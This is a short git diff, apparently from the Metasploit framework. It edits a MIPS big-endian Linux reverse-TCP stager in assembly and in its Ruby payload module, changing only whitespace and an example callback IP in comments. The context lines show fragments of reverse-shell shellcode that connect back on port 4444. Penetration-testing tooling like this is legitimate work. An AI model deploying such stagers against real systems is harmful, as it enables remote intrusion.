diff --git a/external/source/shellcode/linux/mipsbe/stager_sock_reverse.s b/external/source/shellcode/linux/mipsbe/stager_sock_reverse.s index 61f558e4e2..0e8f53b88a 100644 --- a/external/source/shellcode/linux/mipsbe/stager_sock_reverse.s +++ b/external/source/shellcode/linux/mipsbe/stager_sock_reverse.s @@ -29,7 +29,7 @@ ## .text .align 2 - .globl main + .globl main .set nomips16 main: .set noreorder @@ -50,7 +50,7 @@ main: bne $s0, $zero, failed sw $v0, -4($sp) # store the file descriptor for the socket on the stack - # connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16) + # connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("127.0.0.1")}, 16) # a0: sockfd # a1: addr = AF_INET (2) # a2: addrlen = 16 diff --git a/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb b/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb index f20f1d2e0a..6e22a50aed 100644 --- a/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb @@ -59,7 +59,7 @@ module MetasploitModule "\x24\x0c\xff\xef" + # li t4,-17 "\x01\x80\x30\x27" + # nor a2,t4,zero "\x24\x02\x10\x4a" + # li v0,4170 - # connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16) + # connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("127.0.0.1")}, 16) "\x01\x01\x01\x0c" + # syscall 0x40404 "\x00\x07\x80\x2a" + # slt s0,zero,a3 "\x16\x00\x00\x25" + # bnez s0,0x4006bc